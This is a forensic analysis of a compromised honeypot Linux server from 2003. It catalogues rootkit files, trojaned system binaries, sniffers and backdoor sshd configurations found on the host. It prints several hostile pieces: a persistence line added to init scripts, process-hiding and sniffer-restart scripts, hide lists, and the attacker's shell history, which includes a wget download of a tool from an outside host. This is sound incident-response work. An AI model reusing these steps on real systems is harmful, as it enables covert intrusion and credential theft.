Created: 29/09/2003 00:26

 

Forensics Analysis


Files obtained from system sbm79.dtc.apu.edu at Sun Aug 10 20:31:41 PDT 2003

 

/dev/shm/k

 

 

ELF executable, it is a exploit of the ptrace vulnerability, to increase system privileges to uid 0 (root).

 

 

 

 

 

 

 

 

 

/dev/ttyof

 

 

d14dd73ee79bd009fc5473852ea55fac ---> 74 bytes <---

Contains the list of processes / strings to hide from the output of the trojaned 'ps' command. It contains:

psbnc
smbd
iceconf.h
icekey.h
icepid.h
uptime
startwu
r00t

Extracted from rk.tar.gz

 

 

 

 

 

 

 

 

/dev/ttyoa

 

 

9822e71858735f58e142293ad1695166 ---> 134 bytes <---

Contains the list of addresses to hide from trojaned 'netstat' command. Its contents:

1 213.233
1 24.104
1 217.10
1 216
1 193
1 209.118
3 10001
3 10002
3 13064 
3 19
3 69
3 6667
4 10001
4 6667 
4 10002
4 19
4 69
4 13064

The file was extracted from sk.tar.gz. In particular, the following connections were hidden: (found with trusted netstat command)

tcp  0 0 192.168.1.79:1149    64.62.96.42:6667       ESTABLISHED 15119/initd
tcp  0 0 192.168.1.79:1146    199.184.165.133:6667   ESTABLISHED 15119/initd
udp  0 0 192.168.1.79:1029    192.168.1.1:53         ESTABLISHED 15458/sendmail

initd is part of the psybnc package (see below).

 

 

 

 

 

 

 

 

 

/dev/ttyof

 

 

95400773ef48d3898960c918553a74e4 ---> 59 bytes <---

Contains the list of strings to hide from trojaned 'ls' command. It contains:

psbnc
smbd
iceconf.h
icekey.h
icepid.h
uptime
startwu
r00t

Extracted from rk.tar.gz

 

 

 

 

 

 

 

 

 

/dev/hdx1

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty file. In fact, it is (along with /dev/hdx2) a lock/semaphore file used by RST.b virus. This proves that several files, as 'sp0' or 'k' are contaminated with RST.b. The string 'GET /~telcom69/gov.php' inside these files confirms this.

RST.b is a virus that tries to read both on pp0 and eth0 in promiscuous mode.

See http://www.securityfocus.com/archive/100/247640 for details

 

 

 

 

 

 

 

 

 

/dev/hdx2

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

See /dev/hdx1 description

 

 

 

 

 

 

 

 

 

/var/lib/slocate/slocate.db

 

 

3463b9f061397de435c3fa4f7201e9dc ---> 219308 bytes <---

slocate database file has been automatically rebuilt.

 

 

 

 

 

 

 

 

 

/var/lib/random-seed

 

 

3ab2b49b2d1f188a6f898435d550f2a4 ---> 512 bytes <---

Random seed file for standard sshd server.

 

 

 

 

 

 

 

 

 

/var/lib/logrotate.status

 

 

385d12f5f0295bc888e832fecf21f838 ---> 554 bytes <---

Standard logrotate default state file. Nothing interesting here.

 

 

 

 

 

 

 

 

 

/var/log/wtmp

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty access log file.

 

 

 

 

 

 

 

 

 

/var/log/secure

 

 

9db9bac6f1a7083b89a49880138453da ---> 179 bytes <---

Log file that shows:

·  a telnet connection from 193.109.122.5, at Aug 10 16:04

·  a ssh connection from 202.85.165.46, at Aug 10 18:58.

 

 

 

 

 

 

 

 

 

/var/log/maillog

 

 

c59428104fb9d66018093d4b91706fe5 ---> 16358 bytes <---

Log file that shows:

·  lots of error messages mailed to root.

·  a mail sent to [email protected] at Aug 10 14:14:01

·  a mail sent to [email protected] at Aug 10 15:37:40

·  a mail sent to [email protected] at Aug 10 15:42:31

·  a mail sent to [email protected] at Aug 10 15:43:43

·  a mail sent to [email protected] at Aug 10 16:34:50 .

 

 

 

 

 

 

 

 

 

/var/log/cron

 

 

10ca2eef8abbc3b987773d0594f6cd18 ---> 3665 bytes <---

Shows that /usr/lib/sa/sa1 is executed every 10 minutes (but fails, see /var/spool/mail/root).

 

 

 

 

 

 

 

 

 

/var/log/boot.log

 

 

76eb13e6be26ca1e55c03c1aae2b7028 ---> 676 bytes <---

Log file. Some facts are showed there:

·  syslog startup & shutdown at Aug 10 13:33:57

·  sshd failed to start at Aug 10 14:13:47

·  httpd was restarted at Aug 10 15:52:10, and log file was previously deleted

 

 

 

 

 

 

 

 

 

/var/cache/man/whatis

 

 

71aa662387df40232004266b564e6eb4 ---> 80834 bytes <---

Whatis cache file was rebuilt.

 

 

 

 

 

 

 

 

 

/var/cache/samba/smbd.pid

 

 

0ffe5895797d438f4dcda5e8d61c53a4 ---> 20 bytes <---

Standard pid file for samba server daemon.

 

 

 

 

 

 

 

 

 

/var/cache/samba/connections.tdb

 

 

9359defefbf14f5abe7979302dcf3330 ---> 8192 bytes <---

Standard connections file for samba server daemon.

 

 

 

 

 

 

 

 

 

/var/cache/samba/nmbd.pid

 

 

dd79b9b3fbd87b8cf5902769774dfd1e ---> 20 bytes <---

Standard pid file for netbios server daemon.

Unknown file.

 

 

 

 

 

 

 

 

 

/var/lock/subsys/netfs

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

 

 

 

 

 

 

 

 

 

/var/lock/subsys/identd

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

 

 

 

 

 

 

 

 

 

/var/lock/subsys/xinetd

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

 

 

 

 

 

 

 

 

 

/var/lock/subsys/smb

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

 

 

 

 

 

 

 

 

 

/var/lock/subsys/atd

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

 

 

 

 

 

 

 

 

 

/var/run/utmp

 

 

31aec4f90967e75fe302bc284dd2bcf2 ---> 4224 bytes <---

utmp run file. Shows system boot at Aug 9 14:34 & console root login one minute later. Nothing new.

 

 

 

 

 

 

 

 

 

/var/run/runlevel.dir

 

 

4d637364dbabc3b52dcc9b62de6c743e ---> 11 bytes <---

Shows that we are in runlevel 3.

 

 

 

 

 

 

 

 

 

/var/run/syslogd.pid

 

 

f3244ea97307a780a6ab2a4a7a09d1e7 ---> 5 bytes <---

Syslogd is PID 3247. Interesting point is that proves that syslog was restarted at Aug 10 13:33

 

 

 

 

 

 

 

 

 

/var/run/klogd.pid

 

 

3bf921f003734f68d89171a6b5fbd406 ---> 5 bytes <---

klogd is PID 3252. Again, the interesting point is that proves that log system was restarted at Aug 10 13:33

 

 

 

 

 

 

 

 

 

/var/run/apmd.pid

 

 

10acb03f24b5df50f22482fc620cc76c ---> 4 bytes <---

apmd is PID 657. It was started at system boot at Aug 9 14:34. No hacking info here

 

 

 

 

 

 

 

 

 

/var/run/identd.pid

 

 

d0fe75fd3cb3d50a2a4744dbd3ed8c7d ---> 4 bytes <---

identd is PID 677. It was started at system boot at Aug 9 14:34. No hacking info here

 

 

 

 

 

 

 

 

 

/var/run/sshd.pid

 

 

aba3121d9a4398d318b708926dbf880d ---> 4 bytes <---

sshd is PID 699. It was started at system boot at Aug 9 14:34. But the file was accessed at Aug 10 14:13. Probably hacker or an automatic program checked for sshd pid.

 

 

 

 

 

 

 

 

 

/var/run/xinetd.pid

 

 

a2ef60a97da72fbbcd66da60bc0faaf8 ---> 4 bytes <---

xinetd is PID 732. It was started at system boot at Aug 9 14:34. No hacking info here

 

 

 

 

 

 

 

 

 

/var/run/sendmail.pid

 

 

d7dc9e01362a0627d64bd922455603ba ---> 32 bytes <---

sendmail is PID 759. It was started at system boot at Aug 9 14:34. No hacking info here

 

 

 

 

 

 

 

 

 

/var/run/gpm.pid

 

 

99f37a9889067f04d2d9fbc67ca448f0 ---> 4 bytes <---

gpm is PID 778. It was started at system boot at Aug 9 14:34. No hacking info here

 

 

 

 

 

 

 

 

 

/var/run/crond.pid

 

 

95f378603a9d5b8c158a2e627ae09abd ---> 4 bytes <---

crond is PID 820. It was started at system boot at Aug 9 14:34. No hacking info here

 

 

 

 

 

 

 

 

 

/var/run/atd.pid

 

 

8190fe72621c532e70e93e038ab717ca ---> 4 bytes <---

atd is PID 886. It was started at system boot at Aug 9 14:34. But process is no longer there.

 

 

 

 

 

 

 

 

 

/var/run/httpd.mm.14637.sem

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Shows httpd was restarted at Aug 10 15:52, after executing /root/sslstop/sslport.

 

 

 

 

 

 

 

 

 

/var/run/httpd.mm.14671.sem

 

 

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Shows httpd was restarted at Aug 10 15:54.

 

 

 

 

 

 

 

 

 

/var/spool/mail/root

 

 

a2cd5914ecbbec368df64bd0cba042ec ---> 15262 bytes <---

There are a lot of mails from cron deamon. Every ten minutes, it tries to run /usr/lib/sa/sa1, but fails, as /var/log/sa/sa10 cannot be opened.

 

 

 

 

 

 

 

 

 

/var/spool/anacron/cron.daily

 

 

bf129e89502a383fbc508d01c0ed7f73 ---> 9 bytes <---

Content shows 10 Aug 2003.

 

 

 

 

 

 

 

 

 

/var/spool/anacron/cron.weekly

 

 

bf129e89502a383fbc508d01c0ed7f73 ---> 9 bytes <---

Content shows 10 Aug 2003.

 

 

 

 

 

 

 

 

 

/etc/mtab

 

 

74cc4500b7cf083a5cc7deb090d7eadf ---> 193 bytes <---

This file is modified by my initial 'mount /dev/cdrom /mnt/cdrom' command, needed to access trusted static binaries.

 

 

 

 

 

 

 

 

 

/etc/opt/psyBNC2.3.1.tar.gz

 

 

d583ed4e3a98f71ac5ae8b5e4caf3424 ---> 312188 bytes <---

This file contains the psyBNC 2.3.1 package. psyBNC is an IRC proxy that allows anonymization. psyBNC was downloaded & installed by our hacker at Aug 10 15:57. See http://www.netknowledgebase.com/tutorials/psybnc.html for details about psybnc

 

 

 

 

 

 

 

 

 

/etc/opt/psybnc/ & files inside

 

 

---> 4096 bytes <---

Extracted files from package above. The configuration file 'psybnc.conf' shows several entries, among them:

PSYBNC.SYSTEM.PORT1=65336
PSYBNC.SYSTEM.PORT2=-100
USER1.USER.LOGIN=sic
USER1.USER.NICK=[[[kgb]]]
USER1.SERVERS.SERVER1=mesa.az.us.undernet.org
USER1.SERVERS.PORT1=6667
USER1.CHANNELS.ENTRY1=#radioactiv
USER1.CHANNELS.ENTRY0=#RedCode
USER2.USER.LOGIN=redcode
USER2.USER.NICK=redcode
USER2.SERVERS.SERVER1=mesa.az.us.undernet.org
USER2.SERVERS.PORT1=6667
USER2.CHANNELS.ENTRY1=#AiaBuni
USER2.CHANNELS.ENTRY0=#RedCode

 

So, psyBNC was configured to talk to server mesa.az.us.undernet.org, with nick '[[[kgb]]]', and into channels #radioactiv & #RedCode, if using user 'sic'.

And with nick 'redcode', into channels #AiaBuni & #RedCode.

The system uses ports 65336 & 65436, apart from standard 6667 IRC port.

 

 

 

 

 

 

 

 

 

/etc/rc.d/init.d/functions

 

 

d19a34be51db694afbe844f01ff6f230 ---> 9315 bytes <---

It is the original functions file, but the following line was added at the end:

/usr/bin/crontabs -t1 -X53 -p

so it starts the trojaned 'crontabs' binary at system startup. It was modified by script 'install' inside rk.tar.gz

 

 

 

 

 

 

 

 

 

/etc/rc.d/rc.sysinit

 

 

bde52d602f2a66a51a3d0fd958397640 ---> 20991 bytes <---

This system file has been modified to load kernel modules, regardless of configuration, and start kflushd. Doing a ‘diff’ command with a standard rc.sysinit for RedHat 7.2 gives:

56c56

< if grep -q /initrd /proc/mounts && ! grep -q /initrd/loopfs /proc/mounts ; then

---

> if grep -q /initrd /proc/mounts ; then

439c439

<       action $"Loading sound module ($alias): " modprobe sound

---

>       action $"Loading sound module ($alias): " modprobe $alias

444c444

<       action $"Loading sound module ($alias): " modprobe sound-slot-0

---

>       action $"Loading sound module ($alias): " modprobe $alias

744,745c735,736

<  [ -r /proc/modules ] && /bin/cat /proc/modules;

<  [ -r /proc/ksyms ] && /bin/cat /proc/ksyms) >/var/log/ksyms.0

---

>  /bin/cat /proc/modules;

>  /bin/cat /proc/ksyms) >/var/log/ksyms.0

754a746

> kflushd

 

 

 

 

 

 

 

 

 

/etc/mail/statistics

 

 

ae6826b360dc7e169fb7409de4eca36e ---> 628 bytes <---

Standard mail statistics file.

 

 

 

 

 

 

 

 

 

/etc/aliases.db

 

 

597e7395603526c9cb37cdfdaaf8175f ---> 12288 bytes <---

Standard mail aliases file.

 

 

 

 

 

 

 

 

 

/etc/adjtime

 

 

31089f51635afd4f8df196c729bdfb14 ---> 48 bytes <---

Standard adjtime file.

 

 

 

 

 

 

 

 

 

/etc/samba/secrets.tdb

 

 

e3eccac859eb4441dce3a4b3640b5bb4 ---> 8192 bytes <---

Standard samba file.

 

 

 

 

 

 

 

 

 

/etc/httpd/conf/httpd.conf

 

 

abb3e3acb5459112415c7bee7a3bf4f4 ---> 50851 bytes <---

httpd configuration file. It has been modified by 'sslstop' & 'sslport' programs (see below), to close the standard SSL port 443 and use 114 instead, under the 'HAVE_SSS' tag instead of 'HAVE_SSL'.

That happened at Aug 10 15:52., and httpd was restarted.

 

 

 

 

 

 

 

 

 

/etc/psdevtab

 

 

928531d369ec509db354994d91a08c51 ---> 12288 bytes <---

This file is the configuration file used by the installed trojans 'top' and 'ps'. It is full of tty devices, so it probably lists the tty's to show info from.

 

 

 

 

 

 

 

 

 

/usr/bin/top

 

 

58a7e5abe4b01923c619aca3431e13a8 ---> 48856 bytes <---

Trojan 'top' command. It uses /dev/psdevtab as configuration file.

Contained in rk.tar.gz, it was instaled at Aug 10 13:33.

The original top binary was moved to /usr/lib/libshift.

 

 

 

 

 

 

 

 

 

/usr/bin/sense

 

 

464dc23cac477c43418eb8d3ef087065 ---> 4060 bytes <---

perl script file. The file itself explains its purpose: Sorts the output from LinSniffer. It was installed at Aug 10 13:33.

Extracted from package rk.tar.gz

 

 

 

 

 

 

 

 

 

/usr/bin/sl2

 

 

4cfae8c44a6d1ede669d41fc320c7325 ---> 8268 bytes <---

Contained in rk.tar.gz package.

ELF Executable. It seems to be a kind of SYN attack tool.

 

 

 

 

 

 

 

 

 

/usr/bin/logclear

 

 

49d1b847a9639501a001036454118a59 ---> 98 bytes <---

Shell script file, it just have four -interesting- lines:

 
killall -9 /usr/bin/"(swapd)"
rm -rf /usr/bin/tcp.log
touch /usr/bin/tcp.log
"(swapd)" >tcp.log &

So, it starts the '(swapd)' sniffer (see below), logging its standard output to /usr/bin/tcp.log

 

 

 

 

 

 

 

 

 

/usr/bin/crontabs

 

 

f4198b40e62130ad6e173443037ded1b ---> 13707 bytes <---

Rootkit file, posing as a system file named 'crontabs'. Contained in rk.tar.gz, it just executes a 'system("smbd -D")', being 'smbd -D' a file name, not the standard smbd daemon with the -D option

It is started from /etc/rc.d/init.d/functions as 'crontabs -t1 -X53 -p' (see above). So it basically it is a method of starting the binary 'smbd -D' without being too noisy.

 

 

 

 

 

 

 

 

 

//usr/bin/smbd -D

 

 

0c9fd2ff1740a4ae5b4a1a3a82846f44 ---> 672527 bytes <---

Another sshd file. It is currently running, as showed by ps & fuser commands.

It uses the configuration file /usr/include/iceconf.h.

Extracted from rk.tar.gz package, its original name was ava1

 

 

 

 

 

 

 

 

 

/usr/bin/(swapd)

 

 

bc6d6b0ffb4e41e4753289fe28cf3521 ---> 18439 bytes <---

Contained in rk.tar.gz. It is an sniffer program, trying to log users & passwords. The source for this binary is in kde.c, inside rk.tar.gz.

It basically sniffs the network, and log users and passwords of standard services to file '/usr/lib/libice.log'.

Its PID is saved in file /usr/bin/x.pid

 

 

 

 

 

 

 

 

 

/usr/bin/x.pid

 

 

6ec8391d492a8b08387b885868124e07 ---> 5 bytes <---

It contains the PID of '(swapd)' sniffer. (see above)

 

 

 

 

 

 

 

 

 

/usr/lib/libshtift/netstat

 

 

0ea03807e53e90b147c4309573ebc76a ---> 83132 bytes <---

This is the original /bin/netstat file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

 

 

 

 

 

 

 

 

 

/usr/lib/libshtift/ps

 

 

881c7af31f6f447e29820fb73dc1dd9a ---> 63180 bytes <---

This is the original /bin/ps file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

 

 

 

 

 

 

 

 

 

/usr/lib/libshtift/ls

 

 

3e743c6bfa1e34f2f2164c6a1f1096d0 ---> 45948 bytes <---

This is the original /bin/ls file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

 

 

 

 

 

 

 

 

 

/usr/lib/libshtift/ifconfig

 

 

e984302652a0c59469a0d8826ae3cdeb ---> 51164 bytes <---

This is the original /sbin/ifconfig file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

 

 

 

 

 

 

 

 

 

/usr/lib/libshtift/top

 

 

6091c2a0a9231844d1ee9d43f29e6767 ---> 34924 bytes <---

This is the original /usr/bin/top file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

 

 

 

 

 

 

 

 

 

/usr/lib/libsss

 

 

3af0bf9dc137cb0122f491a03578fa8d ---> 2 bytes <---

Unknown purpose. Contained in rk.tar.gz.

 

 

 

 

 

 

 

 

 

/usr/lib/libice.log

 

 

ca9b5865f9abf2681626b0425c602854 ---> 47 bytes <---

Log file for sniffer in process 3153 /usr/bin/(swapd) (see above).

It just contains an unfinished telnet connection to the honeypot:

 
proxyscan.undernet.org => 192.168.1.79 [23]
?k

That happened at Aug 10 16:04.

 

 

 

 

 

 

 

 

 

/usr/lib/adore.o

 

 

5ea1d457d6abac0badf6aad483eedec4 ---> 5636 bytes <---

Adore rootkit. See http://stealth.7350.org/rootkits/ for details

It was downloaded from http://izolam.net with wget and compiled, all through an automated script

 

 

 

 

 

 

 

 

 

/usr/lib/cleaner.o

 

 

f7396eecac23103623b75b47488133b2 ---> 1016 bytes <---

Part of the Adore rootkit (see above). Downloaded, compiled and installed with the same script.

 

 

 

 

 

 

 

 

 

/usr/lib/sp0

 

 

18823bc17ecf747f5e7720bc206095e1 ---> 230163 bytes <---

It is sshd trojan binary, using configuration file /usr/lib/sp0_cfg.

 

 

 

 

 

 

 

 

 

/usr/lib/sp0_cfg

 

 

7d35ce8c6f9a4a963499d2e69928d14e ---> 621 bytes <---

Configuration file for ssh server daemon in /usr/lib/sp0. It makes the daemon to listen in port 345, with Host Private key in /usr/lib/sp0_key, and random seed in /usr/lib/sp0_seed.

 

 

 

 

 

 

 

 

 

/usr/lib/sp0_key

 

 

c64a48e10820d5de2c27f6ff1020d5f3 ---> 532 bytes <---

sshd host private key for /usr/lib/sp0. Interesting the string [email protected] inside.

 

 

 

 

 

 

 

 

 

/usr/lib/sp0_seed

 

 

e8f34849cbf8c80edf835b6a5cdc3d35 ---> 513 bytes <---

sshd random seed file for sshd daemon /usr/lib/sp0.

 

 

 

 

 

 

 

 

 

/usr/include/icekey.h

 

 

5039776bb1a636b6a7ea2493d3a4d31c ---> 539 bytes <---

ssh private key. Interesting string inside: [email protected]

Extracted from sk.tar.gz, its original name was 'h'

Used by "smbd -D" binary (see above).

 

 

 

 

 

 

 

 

 

/usr/include/iceconf.h

 

 

18d0615f33203484ec58eaf88a022ca5 ---> 692 bytes <---

sshd configuration file. It configures a server running in port 2003, with host key in /usr/include/icekey.h.

Extracted from sk.tar.gz package, its original name was hh. It was installed by binary program ava1.

Used by "smbd -D" binary (see above).

 

 

 

 

 

 

 

 

 

/usr/include/iceseed.h

 

 

4aac13dcc30140448f54eab730228c81 ---> 512 bytes <---

ssh random seed file.

Used by "smbd -D" binary (see above).

 

 

 

 

 

 

 

 

 

/usr/include/icepid.h

 

 

31bd68ac7cfb460e7f5e68a8eb1c184e ---> 5 bytes <---

Shows the PID of the sshd process with configuration files /usr/include/ice*. It turns out to be process 3137 "smbd -D".

 

 

 

 

 

 

 

 

 

/bin/netstat

 

 

c0e8b6ff00433730794eda274c56de3f ---> 30640 bytes <---

Trojaned netstat command. It uses the file /dev/ttyoa (see above) for configuration, hiding connections from certain addresses & ports.

Contained in rk.tar.gz package

 

 

 

 

 

 

 

 

 

/bin/ps

 

 

a71c756f78583895afe7e03336686f8b ---> 32756 bytes <---

Trojaned 'ps' command. It uses the file /dev/ttyop as configuration file (process to hide from output).

Extracted from rk.tar.gz package.

 

 

 

 

 

 

 

 

 

/bin/ls

 

 

9e7165f965254830d0525fda3168fd7d ---> 36692 bytes <---

Trojaned 'ls' command. It uses the file /dev/ttyof as configuration file (files to hide from output).

Extracted from rk.tar.gz package.

 

 

 

 

 

 

 

 

 

/bin/pico

 

 

8b0afccbb9fec255fe38bdb6d0776ba7 ---> 165136 bytes <---

Extracted from rk.tar.gz package, seems to be a standard 'pico' editor. The hacker doesn't seem to like vim :-).

 

 

 

 

 

 

 

 

 

/lib/.x/hide

 

 

15502d3606c6597a9dfd93c5783cd0a0 ---> 303 bytes <---

Simple Shell script. It hides processes with 'lib/.x', 'xopen' or 'lsn' in its command name, using SuckIT rootkit.

Result is written in hide.log:

 
#!/bin/sh
for i in $(ps aux|grep "/lib/.x"|awk -F " " '{print $2}')
do
/lib/.x/sk i $i >>/lib/.x/hide.log
done
for z in $(ps aux|grep xopen|awk -F " " '{print $2}')
do
/lib/.x/sk i $z >>/lib/.x/hide.log
done
for x in $(ps aux|grep lsn|awk -F " " '{print $2}')
do
/lib/.x/sk i $z >>/lib/.x/hide.log
done

 

 

 

 

 

 

 

 

 

/lib/.x/inst

 

 

cf1d1e50ed26092f8e45f567a8c1d0b8 ---> 59137 bytes <---

Installation binary for SuckIT rootkit. It creates the 'rk' binary and moves standard /sbin/init to /sbin/init13996, putting 'rk' as the new /sbin/init.

But in the honeypot, these actions fail as /sbin/init has the inmutable bit set.

 

 

 

 

 

 

 

 

 

/lib/.x/log

 

 

b25f11e3d1ef6174a70d64b9b9234871 ---> 25795 bytes <---

login executable from SuckIT rootkit.

 

 

 

 

 

 

 

 

 

/lib/.x/cl

 

 

3ae85818c23ade056241888a65dc2d20 ---> 17931 bytes <---

Log file cleaner from the same rootkit.

 

 

 

 

 

 

 

 

 

/lib/.x/ip

 

 

68b329da9893e34099c7d8ad5cb9c940 ---> 1 bytes <---

Unknown purpose file.

 

 

 

 

 

 

 

 

 

/lib/.x/s/s_h_k.pub

 

 

59abb063354d8a91ea81a8bc53a0e243 ---> 340 bytes <---

Unknown purpose file.

 

 

 

 

 

 

 

 

 

/lib/.x/s/sshd_config

 

 

dd85d5ef3d7a2c75ce76cc8949aeebb5 ---> 669 bytes <---

Configuration file for trojan sshd server in /lib/.x/s/xopen.

 

 

 

 

 

 

 

 

 

/lib/.x/s/xopen

 

 

fd444a070eaa57e06d6edb7a112f02cc ---> 217667 bytes <---

sshd troyan.

There are TWO instances running: processes 25239 & 25241

One of them is a trojaned ssh server, with a hacker’s password. The other is a tty sniffer, sending that information through UDP. But,as SucKIT installation didn’t work, the tty sniffing didn’t also.

 

 

 

 

 

 

 

 

 

/lib/.x/s/s_h_k

 

 

95a2ef0596d7b9dbcf7f2105d9fd4986 ---> 536 bytes <---

ssh private key file for server in /lib/.x/s/xopen.

Interesting string inside: "[email protected]"

 

 

 

 

 

 

 

 

 

/lib/.x/s/lsn

 

 

a4073ec9e5602c8ff9fdcd9aee11b56d ---> 5192 bytes <---

Linux sniffer. Compressed with UPX (see http://upx.tsx.org).

Its output is send to /lib/.x/s/mfs

 

 

 

 

 

 

 

 

 

/lib/.x/s/port

 

 

cbe94e12777a4890accf87b6ffcbfdfc ---> 5 bytes <---

Ascii file, contains 3128. It indicates the TCP port being used by /lib/.x/s/xopen for a ssh server.

 

 

 

 

 

 

 

 

 

/lib/.x/s/mfs

 

 

4aaf69370305d47e01f74cf6cb74c237 ---> 1224 bytes <---

Log file of lsn binary (sniffer). It contains register of a few connections.. Several ftp outgoing connections and one incoming telnet:

============================================================
Time: Sun Aug 10 15:40:47     Size: 100
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:40:50     Size: 80
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:40:56     Size: 60
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:41:08     Size: 40
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:41:32     Size: 20
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 16:04:13     Size: 44
Path: proxyscan.undernet.org => 192.168.1.79 [23]
------------------------------------------------------------

 

 

 

 

 

 

 

 

 

/lib/.x/s/r_s

 

 

f87c74d6bc8c09a6f9bd4f005f314f43 ---> 512 bytes <---

Random Seed file for ssh server in /lib/.x/s/xopen.

 

 

 

 

 

 

 

 

 

/lib/.x/s/pid

 

 

cf20da4e54f0b6a827d4a2fdab680528 ---> 6 bytes <---

PID file for ssh server in /lib/.x/s/xopen. Shows the PID 25241, latest running xopen process

 

 

 

 

 

 

 

 

 

/lib/.x/install.log

 

 

4cff27a31b0ba259e1b23ce53fe2ebfc ---> 2442 bytes <---

log file from /lib/.x/s/xopen (process 25239). It is full of entries like:

 
#####################################################
# SucKIT version 1.3b by Unseen  #
#####################################################
 
RK_Init: idt=0xffc17800, FUCK: Can't find sys_call_table[]

Indicating that connection to SucKIT rootkit kernel modules failed.

 

 

 

 

 

 

 

 

 

/lib/.x/hide.log

 

 

64998f31cbc2a3c1bc4fbbf28a0382d7 ---> 222 bytes <---

Log file for 'hide' script (see above). SucKIT rootkit installation didn't work, as the file tell us:

 
#####################################################
# SucKIT version 1.3b by Unseen  #
#####################################################
RK_Init: idt=0xffc17800, FUCK: Can't find sys_call_table[]

 

 

 

 

 

 

 

 

 

/lib/.x/sk

 

 

4a2ba3c11bc601716a0af3d0dcd0b158 ---> 28632 bytes <---

SuckIT rootkit, version 1.3b., see http://sd.g-art.nl/sk

From its README file:

 
  The SucKIT is easy-to-use, Linux-i386 kernel-based rootkit. The code
  stays in memory through /dev/kmem trick, without help of LKM support
  nor System.map or such things. Everything is done on the fly. It can
  hide PIDs, files, tcp/udp/raw sockets, sniff TTYs. Next, it have
  integrated TTY shell access (xor+sha1) which can be invoked through
  any running service on a server. No compiling on target box needed,
  one binary can work on any of 2.2.x & 2.4.x kernels precompiled (libc-free)

 

This binary was created by script 'inst'

 

 

 

 

 

 

 

 

 

/lib/.x/.boot

 

 

b3b377e87fecd930a4a6fbf13aac054f ---> 1223 bytes <---

Installation script for sucKIT & friends.

In particular, it tries to start the ssh server, the network sniffer and the tty sniffer, hiding its associated processes. It then mails this information to [email protected]

(Un)fortunately it didn't work

 

 

 

 

 

 

 

 

 

/root/sslstop.tar.gz

 

 

b8fdf7e848fde9e659ac6bc2c22fc871 ---> 1627 bytes <---

sslstop package. It contains the sources for two programs: sslstop & sslport, that change the httpd configuration, so that http does no longer use standard ssl port 443, and changes the entry HAVE_SSL with HAVE_SSS.

 

 

 

 

 

 

 

 

 

/root/sslstop/Makefile

 

 

67c55b1cd1c1e0fb259fa0944cdba875 ---> 87 bytes <---

Makefile for the sslstop package. (see above)

 

 

 

 

 

 

 

 

 

/root/sslstop/sslport.c

 

 

2716b9205cafdd8026521884aa64238c ---> 2794 bytes <---

Source file for the sslport binary.

 

 

 

 

 

 

 

 

 

/root/sslstop/sslstop.c

 

 

1288b008faeb780f22aae86fe9397d6a ---> 1809 bytes <---

Source file for the sslstop binary.

 

 

 

 

 

 

 

 

 

/root/sslstop/sslstop

 

 

5bcd845b4f43b24c1c584b7b495f502e ---> 16452 bytes <---

sslstop binary, from the package above.

 

 

 

 

 

 

 

 

 

/root/sslstop/sslport

 

 

ee39910251ea42f812334865dfb84613 ---> 17351 bytes <---

sslport binary, from the package above.

 

 

 

 

 

 

 

 

 

/sbin/ifconfig

 

 

bbdf9f3d6ed21c03b594adcd936c2961 ---> 22328 bytes <---

Trojan ifconfig binary. It hides the PROMISC status of the interface.

Contained in rk.tar.gz package

 

 

 

 

 

 

 

 

 

/.bash_history

 

 

58a1787224e531e42880e5af2bd2ac69 ---> 235 bytes <---

History file. It contains the following commands:

 
uptime
./inst
hostname
hostname sbm79.dtc.apu.edu
cd /dev/shm/sc
./install sbm79.dtc.apu.edu
rm -rf /var/mail/root
ps x
cd /tmp
ls -a
wget izolam.net/sslstop.tar.gz
ps x
ps aux | grep apache
kill -9  21510  21511 23289  23292 23302